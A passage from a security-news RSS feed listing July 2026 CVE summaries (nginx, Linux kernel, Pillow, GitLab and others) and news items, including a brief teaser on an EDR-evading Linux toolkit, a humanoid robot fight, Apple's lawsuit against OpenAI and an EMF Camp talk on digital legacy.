<span data-contrast="auto">The initial report was submitted to F5 SIRT on May 17, 2026, with follow-up analyses covering additional variants, including cross-directive triggering and named capture clobbering. While a proof-of-concept exploit exists, the researcher said it will be withheld until users have sufficient time to apply patches, citing concerns over rapid exploitation following previous <a href="https://thecyberexpress.com/nginx-rift-cve-2026-42945-active-exploitation/" target="_blank" rel="noopener">nginx</a> vulnerability disclosures.</span><span data-ccp-props="{}"> </span>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-45568 | openziti zrok up to 2.0.2 ProxyShare server-side request forgery]]></title>
<description><![CDATA[A vulnerability labeled as critical has been found in openziti zrok up to 2.0.2. Affected by this issue is some unknown functionality of the component ProxyShare. The manipulation results in server-side request forgery.

This vulnerability was named CVE-2026-45568. The attack may be performed fro...]]></description>
<link>https://tsecurity.de/de/3680384/sicherheitsluecken/cve-2026-45568-openziti-zrok-up-to-202-proxyshare-server-side-request-forgery/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3680384/sicherheitsluecken/cve-2026-45568-openziti-zrok-up-to-202-proxyshare-server-side-request-forgery/</guid>
<pubDate>Mon, 20 Jul 2026 08:24:01 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability labeled as <a href="https://vuldb.com/kb/risk">critical</a> has been found in <a href="https://vuldb.com/product/openziti:zrok">openziti zrok up to 2.0.2</a>. Affected by this issue is some unknown functionality of the component <em>ProxyShare</em>. The manipulation results in server-side request forgery.

This vulnerability was named <a href="https://vuldb.com/cve/CVE-2026-45568">CVE-2026-45568</a>. The attack may be performed from remote. There is no available exploit.]]></content:encoded>
</item>
<item>
<title><![CDATA[Furtex Linux Toolkit Uses io_uring and eBPF to Bypass EDR and Falco Detection]]></title>
<description><![CDATA[A newly published Linux toolkit named Furtex showcases a wide range of concepts related to post-exploitation, persistence, data access, and monitoring evasion. It is built around io_uring, eBPF, BPF maps, and raw system calls. The project includes over 100 tools…
Read more →
The post Furtex Linux...]]></description>
<link>https://tsecurity.de/de/3680370/it-security-nachrichten/furtex-linux-toolkit-uses-iouring-and-ebpf-to-bypass-edr-and-falco-detection/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3680370/it-security-nachrichten/furtex-linux-toolkit-uses-iouring-and-ebpf-to-bypass-edr-and-falco-detection/</guid>
<pubDate>Mon, 20 Jul 2026 08:22:55 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A newly published Linux toolkit named Furtex showcases a wide range of concepts related to post-exploitation, persistence, data access, and monitoring evasion. It is built around io_uring, eBPF, BPF maps, and raw system calls. The project includes over 100 tools…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/furtex-linux-toolkit-uses-io_uring-and-ebpf-to-bypass-edr-and-falco-detection/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/furtex-linux-toolkit-uses-io_uring-and-ebpf-to-bypass-edr-and-falco-detection/">Furtex Linux Toolkit Uses io_uring and eBPF to Bypass EDR and Falco Detection</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Furtex Linux Toolkit Uses io_uring and eBPF to Bypass EDR and Falco Detection]]></title>
<description><![CDATA[A newly published Linux toolkit named Furtex showcases a wide range of concepts related to post-exploitation, persistence, data access, and monitoring evasion. It is built around io_uring, eBPF, BPF maps, and raw system calls. The project includes over 100 tools organized into modules that cover ...]]></description>
<link>https://tsecurity.de/de/3680276/it-security-nachrichten/furtex-linux-toolkit-uses-iouring-and-ebpf-to-bypass-edr-and-falco-detection/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3680276/it-security-nachrichten/furtex-linux-toolkit-uses-iouring-and-ebpf-to-bypass-edr-and-falco-detection/</guid>
<pubDate>Mon, 20 Jul 2026 07:53:47 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A newly published Linux toolkit named Furtex showcases a wide range of concepts related to post-exploitation, persistence, data access, and monitoring evasion. It is built around io_uring, eBPF, BPF maps, and raw system calls. The project includes over 100 tools organized into modules that cover asynchronous I/O operations, BPF inspection and manipulation, EDR evasion techniques, […]</p>
<p>The post <a href="https://gbhackers.com/furtex-linux-toolkit/">Furtex Linux Toolkit Uses io_uring and eBPF to Bypass EDR and Falco Detection</a> appeared first on <a href="https://gbhackers.com/">GBHackers Security | #1 Globally Trusted Cyber Security News Platform</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-49802 | Microsoft Windows 11 24H2/11 25H2/11 26H1/Server 2025 USB Print Driver race condition]]></title>
<description><![CDATA[A vulnerability was found in Microsoft Windows 11 24H2/11 25H2/11 26H1/Server 2025. It has been classified as very critical. This impacts an unknown function of the component USB Print Driver. Performing a manipulation results in race condition.

This vulnerability was named CVE-2026-49802. The a...]]></description>
<link>https://tsecurity.de/de/3680158/sicherheitsluecken/cve-2026-49802-microsoft-windows-11-24h211-25h211-26h1server-2025-usb-print-driver-race-condition/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3680158/sicherheitsluecken/cve-2026-49802-microsoft-windows-11-24h211-25h211-26h1server-2025-usb-print-driver-race-condition/</guid>
<pubDate>Mon, 20 Jul 2026 02:41:30 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/microsoft:windows">Microsoft Windows 11 24H2/11 25H2/11 26H1/Server 2025</a>. It has been classified as <a href="https://vuldb.com/kb/risk">very critical</a>. This impacts an unknown function of the component <em>USB Print Driver</em>. Performing a manipulation results in race condition.

This vulnerability was named <a href="https://vuldb.com/cve/CVE-2026-49802">CVE-2026-49802</a>. The attack needs to be approached locally. There is no available exploit.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-16118 | Red Hat Enterprise Linux 9 MIME Type Detection xdgmimemagic.c xdg_mime_magic_parse_magic_line out-of-bounds write (Nessus ID 327697)]]></title>
<description><![CDATA[A vulnerability was found in Red Hat Enterprise Linux 10, Enterprise Linux 7, Enterprise Linux 8 and Enterprise Linux 9. It has been declared as problematic. This impacts the function xdg_mime_magic_parse_magic_line of the file xdgmimemagic.c of the component MIME Type Detection. The manipulation...]]></description>
<link>https://tsecurity.de/de/3680067/sicherheitsluecken/cve-2026-16118-red-hat-enterprise-linux-9-mime-type-detection-xdgmimemagicc-xdgmimemagicparsemagicline-out-of-bounds-write-nessus-id-327697/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3680067/sicherheitsluecken/cve-2026-16118-red-hat-enterprise-linux-9-mime-type-detection-xdgmimemagicc-xdgmimemagicparsemagicline-out-of-bounds-write-nessus-id-327697/</guid>
<pubDate>Mon, 20 Jul 2026 00:24:02 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/red_hat:enterprise_linux_10">Red Hat Enterprise Linux 10, Enterprise Linux 7, Enterprise Linux 8 and Enterprise Linux 9</a>. It has been declared as <a href="https://vuldb.com/kb/risk">problematic</a>. This impacts the function <code>xdg_mime_magic_parse_magic_line</code> of the file <em>xdgmimemagic.c</em> of the component <em>MIME Type Detection</em>. The manipulation results in out-of-bounds write.

This vulnerability was named <a href="https://vuldb.com/cve/CVE-2026-16118">CVE-2026-16118</a>. The attack needs to be approached locally. There is no available exploit.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-47734 | jelmer dulwich up to 1.2.4 resource consumption (GHSA-xrvj-v92f-53gj / Nessus ID 327732)]]></title>
<description><![CDATA[A vulnerability was found in jelmer dulwich up to 1.2.4. It has been rated as problematic. Affected by this vulnerability is an unknown functionality. Performing a manipulation results in resource consumption.

This vulnerability was named CVE-2026-47734. The attack may be initiated remotely. The...]]></description>
<link>https://tsecurity.de/de/3679933/sicherheitsluecken/cve-2026-47734-jelmer-dulwich-up-to-124-resource-consumption-ghsa-xrvj-v92f-53gj-nessus-id-327732/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3679933/sicherheitsluecken/cve-2026-47734-jelmer-dulwich-up-to-124-resource-consumption-ghsa-xrvj-v92f-53gj-nessus-id-327732/</guid>
<pubDate>Sun, 19 Jul 2026 22:08:16 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/jelmer:dulwich">jelmer dulwich up to 1.2.4</a>. It has been rated as <a href="https://vuldb.com/kb/risk">problematic</a>. Affected by this vulnerability is an unknown functionality. Performing a manipulation results in resource consumption.

This vulnerability was named <a href="https://vuldb.com/cve/CVE-2026-47734">CVE-2026-47734</a>. The attack may be initiated remotely. There is no available exploit.

Upgrading the affected component is advised.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2022-3767 | GitLab DAST Analyzer up to 3.0.31 Request Header information disclosure (Issue 377473 / EUVD-2022-43119)]]></title>
<description><![CDATA[A vulnerability identified as problematic has been detected in GitLab DAST Analyzer up to 3.0.31. This impacts an unknown function of the component Request Header Handler. Performing a manipulation results in information disclosure.

This vulnerability was named CVE-2022-3767. The attack may be i...]]></description>
<link>https://tsecurity.de/de/3679918/sicherheitsluecken/cve-2022-3767-gitlab-dast-analyzer-up-to-3031-request-header-information-disclosure-issue-377473-euvd-2022-43119/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3679918/sicherheitsluecken/cve-2022-3767-gitlab-dast-analyzer-up-to-3031-request-header-information-disclosure-issue-377473-euvd-2022-43119/</guid>
<pubDate>Sun, 19 Jul 2026 22:07:57 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability identified as <a href="https://vuldb.com/kb/risk">problematic</a> has been detected in <a href="https://vuldb.com/product/gitlab:dast_analyzer">GitLab DAST Analyzer up to 3.0.31</a>. This impacts an unknown function of the component <em>Request Header Handler</em>. Performing a manipulation results in information disclosure.

This vulnerability was named <a href="https://vuldb.com/cve/CVE-2022-3767">CVE-2022-3767</a>. The attack may be initiated remotely. There is no available exploit.

You should upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[NASA shares beautiful timelapse of the Psyche spacecraft's view over Mars]]></title>
<description><![CDATA[The spacecraft made a close approach to the red planet in May on its way to explore the asteroid it's named after.]]></description>
<link>https://tsecurity.de/de/3679880/it-nachrichten/nasa-shares-beautiful-timelapse-of-the-psyche-spacecrafts-view-over-mars/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3679880/it-nachrichten/nasa-shares-beautiful-timelapse-of-the-psyche-spacecrafts-view-over-mars/</guid>
<pubDate>Sun, 19 Jul 2026 21:17:23 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The spacecraft made a close approach to the red planet in May on its way to explore the asteroid it's named after.]]></content:encoded>
</item>
<item>
<title><![CDATA[Robot 'Decapitated' in World's First-Ever Humanoid UFC Fight]]></title>
<description><![CDATA["A humanoid robot lost its head," reports Newsweek, "during the world's first free-combat tournament for full-sized humanoid robots." 

The Ultimate Robot Knock-out Legend competition began Thursday in Shenzhen, China, according to the article, with local robotics company EngineAI providing $40,0...]]></description>
<link>https://tsecurity.de/de/3679812/it-security-nachrichten/robot-decapitated-in-worlds-first-ever-humanoid-ufc-fight/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3679812/it-security-nachrichten/robot-decapitated-in-worlds-first-ever-humanoid-ufc-fight/</guid>
<pubDate>Sun, 19 Jul 2026 20:07:02 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA["A humanoid robot lost its head," reports Newsweek, "during the world's first free-combat tournament for full-sized humanoid robots." 

The Ultimate Robot Knock-out Legend competition began Thursday in Shenzhen, China, according to the article, with local robotics company EngineAI providing $40,000 of their "T800" robots (yes, named after The Terminator) to 32 participating teams from around the world:

A video shared of the combat on YouTube by local news outlet Shenzhen Story, showed that even after one of the robots had its head practically knocked off its shoulders, it continued to fight, throwing punches at its opponent and kicking into the air... [White humanoid robot "White Eagle"] landed a high kick to the head of its black opponent, "Matador," which made the robot's head rock precariously in its socket before rolling completely out of place. The two continued to spar as Matador's head was swinging from its socket until eventually the robot fell, crushing its head underneath its body. 
Matador tried to scramble back to its feet, but its head flew off and the robot then collapsed back down. The White Eagle did a celebratory dance for the crowd as the fight concluded, and did a move that mimicked that of someone flexing their biceps. The White Eagle waited in the ring, fists still up, as Matador was carried away, occasionally doing a few more dance moves... 

Per a report by Global Times, the winning team will be awarded a gold championship belt worth $1.44 million (10 million yuan) by the event organizer. 


It's a strange fight. The robots sometimes seem unaware of where their opponent is, facing the wrong direction or throwing kicks and punches in the air. In the first round White Eagle just knocks over Matador, who then isn't able to stand back up. (And White Eagle again appears to do a victorious dance.) 

EngineAI's site says they aim to "promote the development of robot combat events toward greater professionalism, scale, and industrialization," while fostering innovation and global collaboration. 

Thanks to Slashdot reader pbahra for sharing the news.<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=Robot+'Decapitated'+in+World's+First-Ever+Humanoid+UFC+Fight%3A+https%3A%2F%2Fhardware.slashdot.org%2Fstory%2F26%2F07%2F19%2F1746241%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Fhardware.slashdot.org%2Fstory%2F26%2F07%2F19%2F1746241%2Frobot-decapitated-in-worlds-first-ever-humanoid-ufc-fight%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://hardware.slashdot.org/story/26/07/19/1746241/robot-decapitated-in-worlds-first-ever-humanoid-ufc-fight?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-63802 | Linux Kernel up to 6.6.143/6.12.94/6.18.37/7.1.2 Blk-Cgroup __blkcg_rstat_flush use after free (EUVD-2026-45468)]]></title>
<description><![CDATA[A vulnerability was found in Linux Kernel up to 6.6.143/6.12.94/6.18.37/7.1.2. It has been declared as very critical. Affected is the function __blkcg_rstat_flush of the component Blk-Cgroup. The manipulation results in use after free.

This vulnerability was named CVE-2026-63802. The attack may ...]]></description>
<link>https://tsecurity.de/de/3679702/sicherheitsluecken/cve-2026-63802-linux-kernel-up-to-661436129461837712-blk-cgroup-blkcgrstatflush-use-after-free-euvd-2026-45468/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3679702/sicherheitsluecken/cve-2026-63802-linux-kernel-up-to-661436129461837712-blk-cgroup-blkcgrstatflush-use-after-free-euvd-2026-45468/</guid>
<pubDate>Sun, 19 Jul 2026 17:38:31 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/linux:kernel">Linux Kernel up to 6.6.143/6.12.94/6.18.37/7.1.2</a>. It has been declared as <a href="https://vuldb.com/kb/risk">very critical</a>. Affected is the function <code>__blkcg_rstat_flush</code> of the component <em>Blk-Cgroup</em>. The manipulation results in use after free.

This vulnerability was named <a href="https://vuldb.com/cve/CVE-2026-63802">CVE-2026-63802</a>. The attack may be performed from remote. There is no available exploit.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-63798 | Linux Kernel up to 7.1.2 Irqchip ImgPdc pdc_intc_remove flags use after free (EUVD-2026-45464)]]></title>
<description><![CDATA[A vulnerability was found in Linux Kernel up to 7.1.2. It has been classified as very critical. The affected element is the function pdc_intc_remove of the component Irqchip ImgPdc. Performing a manipulation of the argument flags results in use after free.

This vulnerability was named CVE-2026-6...]]></description>
<link>https://tsecurity.de/de/3679701/sicherheitsluecken/cve-2026-63798-linux-kernel-up-to-712-irqchip-imgpdc-pdcintcremove-flags-use-after-free-euvd-2026-45464/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3679701/sicherheitsluecken/cve-2026-63798-linux-kernel-up-to-712-irqchip-imgpdc-pdcintcremove-flags-use-after-free-euvd-2026-45464/</guid>
<pubDate>Sun, 19 Jul 2026 17:38:30 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/linux:kernel">Linux Kernel up to 7.1.2</a>. It has been classified as <a href="https://vuldb.com/kb/risk">very critical</a>. The affected element is the function <code>pdc_intc_remove</code> of the component <em>Irqchip ImgPdc</em>. Performing a manipulation of the argument <em>flags</em> results in use after free.

This vulnerability was named <a href="https://vuldb.com/cve/CVE-2026-63798">CVE-2026-63798</a>. The attack may be initiated remotely. There is no available exploit.]]></content:encoded>
</item>
<item>
<title><![CDATA[Apple probably won't add Jony Ive to OpenAI trade secret theft suit]]></title>
<description><![CDATA[Four years ago, Jony Ive left Apple, and joined OpenAI, yet he isn't named in the intellectual property theft suit. The reasons for that are myriad, ranging from the personal to practical.Jony Ive & OpenAI's Sam Altman | Image Credit: OpenAIOn July 10, Apple launched what looks to become a major ...]]></description>
<link>https://tsecurity.de/de/3679663/ios-mac-os/apple-probably-wont-add-jony-ive-to-openai-trade-secret-theft-suit/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3679663/ios-mac-os/apple-probably-wont-add-jony-ive-to-openai-trade-secret-theft-suit/</guid>
<pubDate>Sun, 19 Jul 2026 17:08:02 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Four years ago, <a href="https://appleinsider.com/inside/jony-ive" title="Jony Ive" data-kpt="1">Jony Ive</a> left Apple, and joined OpenAI, yet he isn't named in the intellectual property theft suit. The reasons for that are myriad, ranging from the personal to practical.<br><br><div><img src="https://photos5.appleinsider.com/gallery/68288-143945-64318-134009-iveandalt-xl-xl.jpg" alt="Two men pose closely in black and white, one wearing glasses and leaning on the other's shoulder, both looking calmly at the camera against a simple background" height="738"><br><span>Jony Ive &amp; OpenAI's Sam Altman | Image Credit: OpenAI</span></div><br>On July 10, <a href="https://appleinsider.com/articles/26/07/10/apple-sues-openai-previous-vp-of-product-design-over-mass-ip-theft">Apple launched</a> what looks to become a <a href="https://appleinsider.com/articles/26/07/13/apples-corporate-espionage-suit-against-openai-isnt-the-first">major lawsuit</a> against OpenAI, accusing ex-Apple employees of stealing intellectual property. However, despite former Apple design chief's links to OpenAI, he isn't in the crosshairs of Apple's lawyers.<br><br>In Sunday's "Power On" <a href="https://www.bloomberg.com/news/newsletters/2026-07-19/why-apple-s-openai-lawsuit-doesn-t-mention-jony-ive-ai-recording-at-genius-bar-mrrv4mix?srnd=undefined">newsletter</a> for <em>Bloomberg</em>, Mark Gurman writes about the lawsuit and the oddity. He believes there are two big reasons for Apple not to implicate Ive in the lawsuit at all.<br><br><br> <a href="https://appleinsider.com/articles/26/07/19/apple-probably-wont-add-jony-ive-to-openai-trade-secret-theft-suit?utm_source=rss">Continue Reading on AppleInsider</a> | <a href="https://forums.appleinsider.com/discussion/244994?urm_source=rss">Discuss on our Forums</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-59199 | python-pillow Pillow up to 12.2.x APIs Image.paste/Image.crop/Image.alpha_composite Coordinate out-of-bounds write (Nessus ID 327748)]]></title>
<description><![CDATA[A vulnerability described as critical has been identified in python-pillow Pillow up to 12.2.x. This vulnerability affects the function Image.paste/Image.crop/Image.alpha_composite of the component APIs. The manipulation of the argument Coordinate results in out-of-bounds write.

This vulnerabili...]]></description>
<link>https://tsecurity.de/de/3679616/sicherheitsluecken/cve-2026-59199-python-pillow-pillow-up-to-122x-apis-imagepasteimagecropimagealphacomposite-coordinate-out-of-bounds-write-nessus-id-327748/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3679616/sicherheitsluecken/cve-2026-59199-python-pillow-pillow-up-to-122x-apis-imagepasteimagecropimagealphacomposite-coordinate-out-of-bounds-write-nessus-id-327748/</guid>
<pubDate>Sun, 19 Jul 2026 16:38:44 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability described as <a href="https://vuldb.com/kb/risk">critical</a> has been identified in <a href="https://vuldb.com/product/python-pillow:pillow">python-pillow Pillow up to 12.2.x</a>. This vulnerability affects the function <code>Image.paste/Image.crop/Image.alpha_composite</code> of the component <em>APIs</em>. The manipulation of the argument <em>Coordinate</em> results in out-of-bounds write.

This vulnerability was named <a href="https://vuldb.com/cve/CVE-2026-59199">CVE-2026-59199</a>. The attack may be performed from remote. There is no available exploit.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-53372 | Linux Kernel VT-d privilege escalation (EUVD-2026-45442)]]></title>
<description><![CDATA[A vulnerability has been found in Linux Kernel and classified as very critical. This impacts an unknown function of the component VT-d. Performing a manipulation results in privilege escalation.

This vulnerability was named CVE-2026-53372. The attack may be initiated remotely. There is no availa...]]></description>
<link>https://tsecurity.de/de/3679540/sicherheitsluecken/cve-2026-53372-linux-kernel-vt-d-privilege-escalation-euvd-2026-45442/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3679540/sicherheitsluecken/cve-2026-53372-linux-kernel-vt-d-privilege-escalation-euvd-2026-45442/</guid>
<pubDate>Sun, 19 Jul 2026 15:38:57 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability has been found in <a href="https://vuldb.com/product/linux:kernel">Linux Kernel</a> and classified as <a href="https://vuldb.com/kb/risk">very critical</a>. This impacts an unknown function of the component <em>VT-d</em>. Performing a manipulation results in privilege escalation.

This vulnerability was named <a href="https://vuldb.com/cve/CVE-2026-53372">CVE-2026-53372</a>. The attack may be initiated remotely. There is no available exploit.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-49284 | SimpleSAMLphp up to 2.4.6/2.5.1 ACS information disclosure (Nessus ID 327791)]]></title>
<description><![CDATA[A vulnerability was found in SimpleSAMLphp up to 2.4.6/2.5.1. It has been classified as problematic. Impacted is an unknown function of the component ACS. Performing a manipulation results in information disclosure.

This vulnerability was named CVE-2026-49284. The attack may be initiated remotel...]]></description>
<link>https://tsecurity.de/de/3679475/sicherheitsluecken/cve-2026-49284-simplesamlphp-up-to-246251-acs-information-disclosure-nessus-id-327791/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3679475/sicherheitsluecken/cve-2026-49284-simplesamlphp-up-to-246251-acs-information-disclosure-nessus-id-327791/</guid>
<pubDate>Sun, 19 Jul 2026 14:36:11 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/simplesamlphp">SimpleSAMLphp up to 2.4.6/2.5.1</a>. It has been classified as <a href="https://vuldb.com/kb/risk">problematic</a>. Impacted is an unknown function of the component <em>ACS</em>. Performing a manipulation results in information disclosure.

This vulnerability was named <a href="https://vuldb.com/cve/CVE-2026-49284">CVE-2026-49284</a>. The attack may be initiated remotely. There is no available exploit.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-54171 | Excon up to 1.4.x RedirectFollower Middleware redirect (Nessus ID 327760)]]></title>
<description><![CDATA[A vulnerability categorized as problematic has been discovered in Excon up to 1.4.x. The affected element is an unknown function of the component RedirectFollower Middleware. The manipulation results in open redirect.

This vulnerability was named CVE-2026-54171. The attack may be performed from ...]]></description>
<link>https://tsecurity.de/de/3679471/sicherheitsluecken/cve-2026-54171-excon-up-to-14x-redirectfollower-middleware-redirect-nessus-id-327760/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3679471/sicherheitsluecken/cve-2026-54171-excon-up-to-14x-redirectfollower-middleware-redirect-nessus-id-327760/</guid>
<pubDate>Sun, 19 Jul 2026 14:36:06 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability categorized as <a href="https://vuldb.com/kb/risk">problematic</a> has been discovered in <a href="https://vuldb.com/product/excon">Excon up to 1.4.x</a>. The affected element is an unknown function of the component <em>RedirectFollower Middleware</em>. The manipulation results in open redirect.

This vulnerability was named <a href="https://vuldb.com/cve/CVE-2026-54171">CVE-2026-54171</a>. The attack may be performed from remote. There is no available exploit.]]></content:encoded>
</item>
<item>
<title><![CDATA[Have you thought about your digital legacy? (emf2026)]]></title>
<description><![CDATA[Content warning: Contains frank conversations about death

Death is inevitable, yet our digital infrastructure remains woefully unprepared for it. While traditional "Letters of Wishes" provide a static roadmap for executors, they lack the agency to interact with our complex, data-driven lives. Th...]]></description>
<link>https://tsecurity.de/de/3679414/it-security-video/have-you-thought-about-your-digital-legacy-emf2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3679414/it-security-video/have-you-thought-about-your-digital-legacy-emf2026/</guid>
<pubDate>Sun, 19 Jul 2026 13:47:50 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Content warning: Contains frank conversations about death

Death is inevitable, yet our digital infrastructure remains woefully unprepared for it. While traditional &quot;Letters of Wishes&quot; provide a static roadmap for executors, they lack the agency to interact with our complex, data-driven lives. This workshop introduces the concept of the Machine-Readable Letter of Wishes: a framework for post-mortem autonomy. By applying a &quot;If This, Then That&quot; (IFTTT) logic to digital legacies, we will explore how to automate final wishes across various services, ensuring data is handled with human dignity and precision.

Traditionally, a Letter of Wishes is a physical document offering non-binding guidance to those named in a will. However, in an era of encrypted accounts, fragmented cloud storage and AI. Paper often falls short. 

This workshop moves from the philosophical to the practical:

* Defining the digital legacy: Identifying the specific data points, social accounts, and assets that constitute a modern legacy.
* Pipe mapping: Applying IFTTT methodology to personal wishes (e.g., &quot;If I am inactive for 12 months, then transfer my photo archive to named person
* Exploring autonomy: Discussing the ethical implications of automated execution and how it can alleviate the &quot;administrative burden of grief&quot; for executors.

In the workshop people will gain a foundational understanding of how automation can protect digital rights and dignity, starting that important conversation that benefits individuals, their loved ones, and society.

Licensed to the public under https://creativecommons.org/licenses/by-sa/4.0/
about this event: https://www.emfcamp.org/schedule/2026/151-have-you-thought-about-your-digital-legacy]]></content:encoded>
</item>
<item>
<title><![CDATA[Have you thought about your digital legacy? (emf2026)]]></title>
<description><![CDATA[Content warning: Contains frank conversations about death

Death is inevitable, yet our digital infrastructure remains woefully unprepared for it. While traditional "Letters of Wishes" provide a static roadmap for executors, they lack the agency to interact with our complex, data-driven lives. Th...]]></description>
<link>https://tsecurity.de/de/3679399/it-security-video/have-you-thought-about-your-digital-legacy-emf2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3679399/it-security-video/have-you-thought-about-your-digital-legacy-emf2026/</guid>
<pubDate>Sun, 19 Jul 2026 13:33:31 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Content warning: Contains frank conversations about death

Death is inevitable, yet our digital infrastructure remains woefully unprepared for it. While traditional &quot;Letters of Wishes&quot; provide a static roadmap for executors, they lack the agency to interact with our complex, data-driven lives. This workshop introduces the concept of the Machine-Readable Letter of Wishes: a framework for post-mortem autonomy. By applying a &quot;If This, Then That&quot; (IFTTT) logic to digital legacies, we will explore how to automate final wishes across various services, ensuring data is handled with human dignity and precision.

Traditionally, a Letter of Wishes is a physical document offering non-binding guidance to those named in a will. However, in an era of encrypted accounts, fragmented cloud storage and AI. Paper often falls short. 

This workshop moves from the philosophical to the practical:

* Defining the digital legacy: Identifying the specific data points, social accounts, and assets that constitute a modern legacy.
* Pipe mapping: Applying IFTTT methodology to personal wishes (e.g., &quot;If I am inactive for 12 months, then transfer my photo archive to named person
* Exploring autonomy: Discussing the ethical implications of automated execution and how it can alleviate the &quot;administrative burden of grief&quot; for executors.

In the workshop people will gain a foundational understanding of how automation can protect digital rights and dignity, starting that important conversation that benefits individuals, their loved ones, and society.

Licensed to the public under https://creativecommons.org/licenses/by-sa/4.0/
about this event: https://www.emfcamp.org/schedule/2026/151-have-you-thought-about-your-digital-legacy]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2022-3706 | GitLab Community Edition/Enterprise Edition up to 15.3.4/15.4.3/15.5.1 Job improper authorization (Issue 365532 / EUVD-2022-43063)]]></title>
<description><![CDATA[A vulnerability has been found in GitLab Community Edition and Enterprise Edition up to 15.3.4/15.4.3/15.5.1 and classified as critical. The impacted element is an unknown function of the component Job Handler. Performing a manipulation results in improper authorization.

This vulnerability was n...]]></description>
<link>https://tsecurity.de/de/3679367/sicherheitsluecken/cve-2022-3706-gitlab-community-editionenterprise-edition-up-to-153415431551-job-improper-authorization-issue-365532-euvd-2022-43063/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3679367/sicherheitsluecken/cve-2022-3706-gitlab-community-editionenterprise-edition-up-to-153415431551-job-improper-authorization-issue-365532-euvd-2022-43063/</guid>
<pubDate>Sun, 19 Jul 2026 13:09:08 +0200</pubDate>
